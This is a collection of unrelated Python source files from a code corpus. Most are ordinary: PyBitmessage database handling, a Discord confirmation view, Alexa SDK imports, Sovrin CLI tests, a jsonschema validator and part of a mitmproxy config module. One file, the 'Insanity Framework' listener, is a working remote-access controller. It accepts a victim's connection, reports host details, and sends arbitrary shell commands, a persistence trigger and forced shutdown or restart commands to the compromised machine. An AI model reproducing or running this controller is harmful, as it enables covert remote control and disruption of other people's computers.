self.cur.execute('''DELETE FROM pubkeys WHERE address='1234' ''')
self.conn.commit()
if transmitdata == '':
logger.fatal(
'Problem: The version of SQLite you have cannot store Null values.'
' Please download and install the latest revision of your version of Python'
' (for example, the latest Python 2.7 revision) and try again.\n')
logger.fatal(
'PyBitmessage will now exit very abruptly.'
' You may now see threading errors related to this abrupt exit'
' but the problem you need to solve is related to SQLite.\n\n')
os._exit(0)
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While null value test) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
logger.error(err)
# Let us check to see the last time we vaccumed the messages.dat file.
# If it has been more than a month let's do it now.
item = '''SELECT value FROM settings WHERE key='lastvacuumtime';'''
parameters = ''
self.cur.execute(item, parameters)
queryreturn = self.cur.fetchall()
for row in queryreturn:
value, = row
if int(value) < int(time.time()) - 86400:
logger.info('It has been a long time since the messages.dat file has been vacuumed. Vacuuming now...')
try:
self.cur.execute(''' VACUUM ''')
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While VACUUM) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
item = '''update settings set value=? WHERE key='lastvacuumtime';'''
parameters = (int(time.time()),)
self.cur.execute(item, parameters)
helper_sql.sql_ready.set()
while True:
item = helper_sql.sqlSubmitQueue.get()
if item == 'commit':
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While committing) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
elif item == 'exit':
self.conn.close()
logger.info('sqlThread exiting gracefully.')
return
elif item == 'movemessagstoprog':
logger.debug('the sqlThread is moving the messages.dat file to the local program directory.')
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while movemessagstoprog) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
self.conn.close()
shutil.move(
paths.lookupAppdataFolder() + 'messages.dat', paths.lookupExeFolder() + 'messages.dat')
self.conn = sqlite3.connect(paths.lookupExeFolder() + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
elif item == 'movemessagstoappdata':
logger.debug('the sqlThread is moving the messages.dat file to the Appdata folder.')
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while movemessagstoappdata) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
self.conn.close()
shutil.move(
paths.lookupExeFolder() + 'messages.dat', paths.lookupAppdataFolder() + 'messages.dat')
self.conn = sqlite3.connect(paths.lookupAppdataFolder() + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
elif item == 'deleteandvacuume':
self.cur.execute('''delete from inbox where folder='trash' ''')
self.cur.execute('''delete from sent where folder='trash' ''')
self.conn.commit()
try:
self.cur.execute(''' VACUUM ''')
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while deleteandvacuume) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
parameters = helper_sql.sqlSubmitQueue.get()
rowcount = 0
try:
self.cur.execute(item, parameters)
rowcount = self.cur.rowcount
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while cur.execute) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
logger.fatal(
'Major error occurred when trying to execute a SQL statement within the sqlThread.'
' Please tell Atheros about this error message or post it in the forum!'
' Error occurred while trying to execute statement: "%s" Here are the parameters;'
' you might want to censor this data with asterisks (***)'
' as it can contain private information: %s.'
' Here is the actual error message thrown by the sqlThread: %s',
str(item),
str(repr(parameters)),
str(err))
logger.fatal('This program shall now abruptly exit!')
os._exit(0)
helper_sql.sqlReturnQueue.put((self.cur.fetchall(), rowcount))
# helper_sql.sqlSubmitQueue.task_done()
def create_function(self):
# create_function
try:
self.conn.create_function("enaddr", 3, func=encodeAddress, deterministic=True)
except (TypeError, sqlite3.NotSupportedError) as err:
logger.debug(
"Got error while pass deterministic in sqlite create function {}, Passing 3 params".format(err))
self.conn.create_function("enaddr", 3, encodeAddress)
|
py | 7df9e2953076f7126207c9d2310cd002836598be | from typing import Any, Optional
from discord import ui
from discord.ext import commands
import discord
class ConfirmView(ui.View):
def __init__(
self,
context: commands.Context,
/,
*,
responded=None,
delete_after=True,
**kwargs: Any,
):
super().__init__(**kwargs)
self.ctx = context
self._result = None
self.message = None
self.delete_after = delete_after
self.responded = responded or context.author
async def prompt(self, *args: str, **kwargs: Any) -> Optional[bool]:
self.message = await self.ctx.send(*args, view=self, **kwargs)
await self.wait()
return self.result
async def interaction_check(self, interaction: discord.Interaction) -> bool:
if self.responded.id != getattr(interaction.user, "id", None):
await interaction.response.send_message(
f"Only {self.responded} can respond to this message!", ephemeral=True
)
return False
return True
async def stopping(self):
if self.delete_after:
await self.message.delete(delay=0)
else:
for item in self.children:
item.disabled = True
await self.message.edit(view=self)
def stop(self):
super().stop()
self.ctx.bot.loop.create_task(self.stopping())
@property
def result(self):
return self._result
@result.setter
def result(self, value):
self._result = value
self.stop()
@ui.button(label="Accept", style=discord.ButtonStyle.green)
async def accept(self, button: ui.Button, interaction: discord.Interaction):
self.result = True
@ui.button(label="Deny", style=discord.ButtonStyle.red)
async def deny(self, button: ui.Button, interaction: discord.Interaction):
self.result = False
|
py | 7df9e34b08fabde5274c3194bcac4f2182c34544 | # coding: utf-8
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
from __future__ import absolute_import
from .endpoint import Endpoint
from .header import Header
from .filter_match_action import FilterMatchAction
from .events_received_request import EventsReceivedRequest
from .expired_request import ExpiredRequest
from .start_event_handler_directive import StartEventHandlerDirective
from .stop_event_handler_directive import StopEventHandlerDirective
from .send_directive_directive import SendDirectiveDirective
from .expiration import Expiration
from .event import Event
from .event_filter import EventFilter
|
py | 7df9e4a35a9912a0ff849a79ca22a78e6ce2804e | from pyramid.response import Response
import os
HERE = os.path.dirname(__file__)
def my_view(request):
imported_text = open(os.path.join(HERE, 'sample.html')).read()
return Response(imported_text)
def includeme(config):
config.add_view(my_view, route_name='home')
|
py | 7df9e4b95c74dd8392d835fae7fb1afc503a4e06 | from PyHive.Attribute import *
|
py | 7df9e4d37df8be078c5b92f21b14d4738d5f8702 | import json
import jsonschema
from jsonschema import validate as jvalidate
from jsonschema import Draft4Validator
from collections import OrderedDict
from os.path import isdir, isfile, join
def get_file_as_dict(fname):
"""Open the file and load as a dict"""
fpath = join('input', fname)
assert isfile(fpath), print('file not found: %s' % fpath)
print('load file: %s' % fpath)
info_dict = json.loads(open(fpath, 'r').read())# object_pairs_hook=OrderedDict)
#if 'xvariables' in info_dict:
# return info_dict['variables']
return info_dict
def run_it(schema_fname, data_fname):
# (1) VALIDATE THE SCHEMA
#
the_schema = get_file_as_dict(schema_fname)
#print(json.dumps(the_schema, indent=4))
try:
Draft4Validator(the_schema)
except jsonschema.exceptions.ValidationError as err_obj:
print('Schema Error. short message: ', err_obj.message)
print('Schema Error. full message: ', err_obj)
return
# (2) VALIDATE THE DATA USING THE SCHEMA
#
the_data = get_file_as_dict(data_fname)
#print(json.dumps(the_data, indent=4))
try:
Draft4Validator(the_schema).validate(the_data)
except jsonschema.exceptions.ValidationError as err_obj:
print('Data Error. short message: ', err_obj.message)
print('Data Error. full message: ', err_obj)
return
print('looking good!')
if __name__ == '__main__':
#run_it('dataset_schema.json', 'dataset_data_02.json')
#run_it('variable_schema.json', 'variable_data_01.json')
#run_it('variable_schema_05.json', 'variable_data_04.json')
run_it('variable_schema_11.json', 'test_data.json')
|
py | 7df9e4df6f967f13136a64320179eef6e6a0fc02 | #!/usr/bin/python
from collections import defaultdict
import os, sys, re, subprocess, tempfile, json, pickle, random, time
if __name__ == '__main__':
types_filename = sys.argv[1]
with open(types_filename, 'r') as f:
types = [t.strip() for t in f.read().splitlines()]
cnt = 0
for i, val in enumerate(types):
index = 0
for j, char in enumerate(val):
if (char == '<') and (val[j+1] == '-'):
index = val[j-2]
cmd = 'Feature{}(?heap{}),'.format(cnt,index)
cnt = cnt+1
print cmd+val
|
py | 7df9e5f004fe026ef72b8c9e30d1643d30f652ef | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
# Copyright 2017 Insanity Framework (IF)
# Written by: * Alisson Moretto - 4w4k3
# https://github.com/4w4k3/Insanity-Framework
# Licensed under the BSD-3-Clause
from socket import *
import os
import sys
from bin.settings import exec_com
from bin.settings import BLUE, RED, WHITE, GREEN, END
if not os.geteuid() == 0:
sys.exit('Insanity must be run as root')
HOST = ''
PORT = int(raw_input('Tʏᴘᴇ ᴛʜᴇ ᴘᴏʀᴛ: '))
def clear():
os.system('clear')
def heading():
sys.stdout.write(RED + '''
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
: ʙʏ: ''' + WHITE + '''Alisson Moretto(''' + RED + '''4ᴡ4ᴋ3''' + WHITE + ''')''' + RED + '''
-- [I]nsanity [F]ramework -- Version: 0.1
''' + END)
def pp():
sys.stdout.write(RED + '''
$u #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$~
$# `"$$$$$$$$$$$$$$$$$$$$$$$$$$| [PROPANE |$$$$$$$
$i $$$$$$$$$$$$$$$$$$$$$$$$$$| [NIGHTMARE |$$$$$$$$
$$ #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#$. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#
$$ $iW$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$!
$$i $$$$$$$#"" `"""#$$$$$$$$$$$$$$$$$#""""""#$$$$$$$$$$$$$$$W
#$$W `$$$#" " !$$$$$` `"#$$$$$$$$$$#
$$$ `` ! !iuW$$$$$ #$$$$$$$#
#$$ $u $ $$$$$$$ $$$$$$$~
"# #$$i. # $$$$$$$. `$$$$$$
$$$$$i. """#$$$$i. .$$$$#
$$$$$$$$! . ` $$$$$$$$$i $$$$$
`$$$$$ $iWW .uW` #$$$$$$$$$W. .$$$$$$#
"#$$$$$$$$$$$$#` $$$$$$$$$$$iWiuuuW$$$$$$$$W
!#"" "" `$$$$$$$##$$$$$$$$$$$$$$$$
i$$$$ . !$$$$$$ .$$$$$$$$$$$$$$$#
$$$$$$$$$$` $$$$$$$$$Wi$$$$$$#"#$$`
#$$$$$$$$$W. $$$$$$$$$$$# ``
`$$$$##$$$$! i$u. $. .i$$$$$$$$$#""''' + WHITE + ''' InSaNiTy FrAmEwOrK''' + RED + '''
" `#W $$$$$$$$$$$$$$$$$$$` u$#
W$$$$$$$$$$$$$$$$$$ $$$$W
$$`!$$$##$$$$``$$$$ $$$$!
i$" $$$$ $$#"` """ W$$$$
''' + END)
clear()
heading()
def mess():
print '[*] O.S.: ' + data2
if vm == 'True':
print '[*] Virtual Machine: {0}Detected{1}'.format(RED, END)
else:
print '[*] Virtual Machine: Not Detected'
print '-{0} Type a remote shell command{1} - {0}[{1}ex: ipconfig{0}]{1}: '.format(BLUE, END)
print '- {0}Run insanity modules{1} - {0}[{1}view available modules on help message{0}]{1}: '.format(BLUE, END)
print '-{0} ʜᴇʟᴘ {1}- {0}[{1}View help message and modules{0}]{1}: '.format(BLUE, END)
s = socket(AF_INET, SOCK_STREAM)
print '[!] Waiting Connections '
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((HOST, PORT))
print "[*] Listening on: 0.0.0.0:%s" % str(PORT)
s.listen(10)
conn, addr = s.accept()
print '[*] Connection: ' + '{0}ESTABLISHED{2}'.format(GREEN, WHITE, END)
data = conn.recv(1024)
ip = conn.recv(1024)
conn.send('whoami')
data2 = conn.recv(1024)
vm = conn.recv(1024)
#oss = conn.recv(1024)
mess()
def help():
print '''
- [I]nsanity [F]ramework -
ᴛʏᴘᴇ {0}info{1} - {0}[{1}show info about victim{0}]{1}
ᴛʏᴘᴇ {0}persistence{1} - {0}[{1}enable persistence{0}]{1}
ᴛʏᴘᴇ {0}shutdown{1} - {0}[{1}turn off remote pc{0}]{1}
ᴛʏᴘᴇ {0}restart{1} - {0}[{1}reboot remote pc{0}]{1}
ᴛʏᴘᴇ {0}back{1} - {0}[{1}return to main menu{0}]{1}
ᴛʏᴘᴇ {0}quit{1} - {0}[{1}tool exit{0}]{1}
'''.format(BLUE, END)
# start loop
def main():
try:
while 1:
# enter shell command
header = ('{0}InSaNiTy{1} > {2}'.format(RED, WHITE, END))
command = raw_input(header)
if command.upper() == 'QUIT':
clear()
pp()
conn.close()
elif command.upper() == 'HELP':
help()
elif command.upper() == 'INFO':
mess()
elif command.upper() == 'BACK':
exec_com('insanity.py')
elif command.upper() == 'PERSISTENCE':
try:
conn.send('persistence')
print '[*] Persistence module enabled'
except:
print '\n'
print '{0}Remote host are disconnected{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
elif command.upper() == 'SHUTDOWN':
try:
conn.send('shutdown -s -t 00 -f')
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
elif command.upper() == 'RESTART':
try:
conn.send('shutdown -r -t 00 -f')
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
else:
try:
if command != '':
data = ''
conn.send(command)
try:
s.settimeout(5.0)
conn.settimeout(5.0)
data = conn.recv(4096)
print data
s.settimeout(None)
conn.settimeout(None)
except:
print '[*] ᴄᴏᴍᴍᴀɴᴅ ᴇxᴇᴄᴜᴛᴇᴅ'
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
except KeyboardInterrupt:
clear()
pp()
conn.close()
if __name__ == '__main__':
main()
|
py | 7df9e64c3e018390aa2257078e19f59682d38954 | import pytest
from plenum.common.signer_did import DidSigner
from plenum.common.signer_simple import SimpleSigner
from sovrin_client.client.wallet.wallet import Wallet
from sovrin_client.test.cli.helper import prompt_is, addNym, ensureConnectedToTestEnv
from sovrin_common.roles import Roles
from sovrin_node.test.did.conftest import wallet, abbrevVerkey
TRUST_ANCHOR_SEED = b'TRUST0NO0ONE00000000000000000000'
@pytest.fixture("module")
def trust_anchor_did_signer():
return DidSigner(seed=TRUST_ANCHOR_SEED)
@pytest.fixture("module")
def trust_anchor_cid_signer():
return SimpleSigner(seed=TRUST_ANCHOR_SEED)
@pytest.fixture("module")
def trustAnchorWallet(trustAnchorSigner):
w = Wallet(trustAnchorSigner.identifier)
w.addIdentifier(signer=trustAnchorSigner)
return w
def testPoolNodesStarted(poolNodesStarted):
pass
@pytest.fixture(scope="module")
def aliceCli(be, do, poolNodesStarted, aliceCLI, connectedToTest, wallet):
be(aliceCLI)
do('prompt Alice', expect=prompt_is('Alice'))
addAndActivateCLIWallet(aliceCLI, wallet)
do('connect test', within=3, expect=connectedToTest)
return aliceCLI
@pytest.fixture(scope="module")
def trustAnchorCli(be, do, poolNodesStarted, earlCLI, connectedToTest,
trustAnchorWallet):
be(earlCLI)
do('prompt Earl', expect=prompt_is('Earl'))
addAndActivateCLIWallet(earlCLI, trustAnchorWallet)
do('connect test', within=3, expect=connectedToTest)
return earlCLI
def getNym(be, do, userCli, idr, expectedMsgs):
be(userCli)
do('send GET_NYM dest={}'.format(idr),
within=3,
expect=expectedMsgs
)
def getNymNotFoundExpectedMsgs(idr):
return ["NYM {} not found".format(idr)]
def testGetDIDWithoutAddingIt(be, do, philCli, trust_anchor_did_signer):
ensureConnectedToTestEnv(be, do, philCli)
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getNymNotFoundExpectedMsgs(trust_anchor_did_signer.identifier))
def testGetCIDWithoutAddingIt(be, do, philCli, trust_anchor_cid_signer):
ensureConnectedToTestEnv(be, do, philCli)
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getNymNotFoundExpectedMsgs(trust_anchor_cid_signer.identifier))
def addAndActivateCLIWallet(cli, wallet):
cli.wallets[wallet.name] = wallet
cli.activeWallet = wallet
@pytest.fixture(scope="module")
def didAdded(be, do, philCli, trust_anchor_did_signer):
ensureConnectedToTestEnv(be, do, philCli)
addNym(be, do, philCli,
trust_anchor_did_signer.identifier,
role=Roles.TRUST_ANCHOR.name
)
return philCli
def testAddDID(didAdded):
pass
@pytest.fixture(scope="module")
def cidAdded(be, do, philCli, trust_anchor_cid_signer):
addNym(be, do, philCli, trust_anchor_cid_signer.identifier, role=Roles.TRUST_ANCHOR.name)
return philCli
def testAddCID(cidAdded):
pass
def getNoVerkeyEverAssignedMsgs(idr):
return ["No verkey ever assigned to the identifier {}".format(idr)]
def testGetDIDWithoutVerkey(be, do, philCli, didAdded, trust_anchor_did_signer):
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getNoVerkeyEverAssignedMsgs(trust_anchor_did_signer.identifier))
def getVerkeyIsSameAsIdentifierMsgs(idr):
return ["Current verkey is same as identifier {}".format(idr)]
def testGetCIDWithoutVerkey(be, do, philCli, cidAdded, trust_anchor_cid_signer):
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getVerkeyIsSameAsIdentifierMsgs(trust_anchor_cid_signer.identifier))
@pytest.fixture(scope="module")
def verkeyAddedToDID(be, do, philCli, didAdded, trust_anchor_did_signer):
addNym(be, do, philCli, trust_anchor_did_signer.identifier,
trust_anchor_did_signer.verkey)
def testAddVerkeyToExistingDID(verkeyAddedToDID):
pass
@pytest.fixture(scope="module")
def verkeyAddedToCID(be, do, philCli, cidAdded, trust_anchor_cid_signer):
# newSigner = SimpleSigner(identifier=trust_anchor_cid_signer.identifier)
# new_verkey = newSigner.verkey
addNym(be, do, philCli, trust_anchor_cid_signer.identifier, verkey=trust_anchor_cid_signer.verkey)
return trust_anchor_cid_signer
def testAddVerkeyToExistingCID(verkeyAddedToCID):
pass
def getCurrentVerkeyIsgMsgs(idr, verkey):
return ["Current verkey for NYM {} is {}".format(idr, verkey)]
def testGetDIDWithVerKey(be, do, philCli, verkeyAddedToDID,
trust_anchor_did_signer):
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getCurrentVerkeyIsgMsgs(trust_anchor_did_signer.identifier,
trust_anchor_did_signer.verkey))
def testGetCIDWithVerKey(be, do, philCli, verkeyAddedToCID,
trust_anchor_cid_signer):
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getCurrentVerkeyIsgMsgs(trust_anchor_cid_signer.identifier,
trust_anchor_cid_signer.verkey))
def getNoActiveVerkeyFoundMsgs(idr):
return ["No active verkey found for the identifier {}".format(idr)]
def addAttribToNym(be, do, userCli, idr, raw):
be(userCli)
do('send ATTRIB dest={} raw={}'.format(idr, raw),
within=5,
expect=["Attribute added for nym {}".format(idr)])
@pytest.mark.skip("INDY- This should not have worked")
def testSendAttribForDID(be, do, verkeyAddedToDID, trust_anchor_did_signer, aliceCli):
raw = '{"name": "Alice"}'
addAttribToNym(be, do, aliceCli, trust_anchor_did_signer.identifier, raw)
@pytest.mark.skip("INDY- This should not have worked")
def testSendAttribForCID(be, do, verkeyAddedToCID, trust_anchor_cid_signer, trustAnchorCli):
raw = '{"name": "Earl"}'
addAttribToNym(be, do, trustAnchorCli, trust_anchor_cid_signer.identifier, raw)
@pytest.fixture(scope="module")
def verkeyRemovedFromExistingDID(be, do, verkeyAddedToDID, abbrevIdr, aliceCli):
be(aliceCli)
addNym(be, do, aliceCli, abbrevIdr, '')
getNym(be, do, aliceCli, abbrevIdr, getNoActiveVerkeyFoundMsgs(abbrevIdr))
@pytest.mark.skip(reason="verkey removal is not supported")
def testRemoveVerkeyFromDID(verkeyRemovedFromExistingDID):
pass
@pytest.fixture(scope="module")
def verkeyRemovedFromExistingCID(be, do, verkeyAddedToCID,
trustAnchorSigner, trustAnchorCli, trustAnchorWallet):
be(trustAnchorCli)
addNym(be, do, trustAnchorCli, trustAnchorSigner.identifier, '')
getNym(be, do, trustAnchorCli, trustAnchorSigner.identifier,
getNoActiveVerkeyFoundMsgs(trustAnchorSigner.identifier))
@pytest.mark.skip(reason="verkey removal is not supported")
def testRemoveVerkeyFromCID(verkeyRemovedFromExistingCID):
pass
@pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set "
"its verkey to blank, no-one including "
"itself can change it")
def testNewverkeyAddedToDID(be, do, philCli, abbrevIdr,
verkeyRemovedFromExistingDID):
newSigner = DidSigner()
addNym(be, do, philCli, abbrevIdr, newSigner.verkey)
getNym(be, do, philCli, abbrevIdr,
getCurrentVerkeyIsgMsgs(abbrevIdr, newSigner.verkey))
@pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set "
"its verkey to blank, no-one including "
"itself can change it")
def testNewverkeyAddedToCID(be, do, philCli, trustAnchorSigner,
verkeyRemovedFromExistingCID):
newSigner = DidSigner()
addNym(be, do, philCli, trustAnchorSigner.identifier, newSigner.verkey)
getNym(be, do, philCli, trustAnchorSigner.identifier,
getCurrentVerkeyIsgMsgs(trustAnchorSigner.identifier, newSigner.verkey))
def testNewKeyChangesWalletsDefaultId(be, do, poolNodesStarted,
susanCLI, connectedToTest):
mywallet = Wallet('my wallet')
keyseed = 'a' * 32
idr, _ = mywallet.addIdentifier(seed=keyseed.encode("utf-8"))
be(susanCLI)
do('connect test', within=3, expect=connectedToTest)
do('new key with seed {}'.format(keyseed))
do('send NYM dest={}'.format(idr))
do('new key with seed 11111111111111111111111111111111')
do('send NYM dest={}'.format(idr), within=3,
expect=["Nym {} added".format(idr)])
|
py | 7df9e692971c6f5f7a3ccd646b60692c6368759e | import base64
import collections
import os
import re
from typing import Any
from mitmproxy.utils import strutils
from OpenSSL import SSL, crypto
from mitmproxy import exceptions
from mitmproxy import options as moptions
from mitmproxy import certs
from mitmproxy.net import tcp
from mitmproxy.net.http import authentication
from mitmproxy.net.http import url
CONF_BASENAME = "mitmproxy"
class HostMatcher:
def __init__(self, patterns=tuple()):
self.patterns = list(patterns)
self.regexes = [re.compile(p, re.IGNORECASE) for p in self.patterns]
def __call__(self, address):
if not address:
return False
address = tcp.Address.wrap(address)
host = "%s:%s" % (address.host, address.port)
if any(rex.search(host) for rex in self.regexes):
return True
else:
return False
def __bool__(self):
return bool(self.patterns)
ServerSpec = collections.namedtuple("ServerSpec", "scheme address")
def parse_server_spec(spec):
try:
p = url.parse(spec)
if p[0] not in (b"http", b"https"):
raise ValueError()
except ValueError:
raise exceptions.OptionsError(
"Invalid server specification: %s" % spec
)
host, port = p[1:3]
address = tcp.Address((host.decode("ascii"), port))
scheme = p[0].decode("ascii").lower()
return ServerSpec(scheme, address)
def parse_upstream_auth(auth):
pattern = re.compile(".+:")
if pattern.search(auth) is None:
raise exceptions.OptionsError(
"Invalid upstream auth specification: %s" % auth
)
return b"Basic" + b" " + base64.b64encode(strutils.always_bytes(auth))
class ProxyConfig:
def __init__(self, options: moptions.Options):
self.options = options
self.authenticator = None
self.check_ignore = None
self.check_tcp = None
self.certstore = None
self.clientcerts = None
self.openssl_verification_mode_server = None
self.configure(options, set(options.keys()))
options.changed.connect(self.configure)
def configure(self, options: moptions.Options, updated: Any) -> None:
if options.add_upstream_certs_to_client_chain and not options.ssl_insecure:
raise exceptions.OptionsError(
"The verify-upstream-cert requires certificate verification to be disabled. "
"If upstream certificates are verified then extra upstream certificates are "
"not available for inclusion to the client chain."
)
if options.ssl_insecure:
self.openssl_verification_mode_server = SSL.VERIFY_NONE
else:
self.openssl_verification_mode_server = SSL.VERIFY_PEER
self.check_ignore = HostMatcher(options.ignore_hosts)
self.check_tcp = HostMatcher(options.tcp_hosts)
self.openssl_method_client, self.openssl_options_client = \
tcp.sslversion_choices[options.ssl_version_client]
self.openssl_method_server, self.openssl_options_server = \
tcp.sslversion_choices[options.ssl_version_server]
certstore_path = os.path.expanduser(options.cadir)
if not os.path.exists(os.path.dirname(certstore_path)):
raise exceptions.OptionsError(
"Certificate Authority parent directory does not exist: %s" %
os.path.dirname(options.cadir)
)
self.certstore = certs.CertStore.from_store(
certstore_path,
CONF_BASENAME
)
if options.clientcerts:
clientcerts = os.path.expanduser(options.clientcerts)
if not os.path.exists(clientcerts):
raise exceptions.OptionsError(
"Client certificate path does not exist: %s" %
options.clientcerts
)
self.clientcerts = clientcerts
for spec, cert in options.certs:
cert = os.path.expanduser(cert)
if not os.path.exists(cert):
raise exceptions.OptionsError(
"Certificate file does not exist: %s" % cert
)
try:
self.certstore.add_cert_file(spec, cert)
except crypto.Error:
raise exceptions.OptionsError(
"Invalid certificate format: %s" % cert
)
self.upstream_server = None
self.upstream_auth = None
if options.upstream_server:
self.upstream_server = parse_server_spec(options.upstream_server)
if options.upstream_auth:
self.upstream_auth = parse_upstream_auth(options.upstream_auth)
self.authenticator = authentication.NullProxyAuth(None)
needsauth = any(
[
options.auth_nonanonymous,
options.auth_singleuser,
options.auth_htpasswd
]
)
if needsauth:
if options.mode == "transparent":
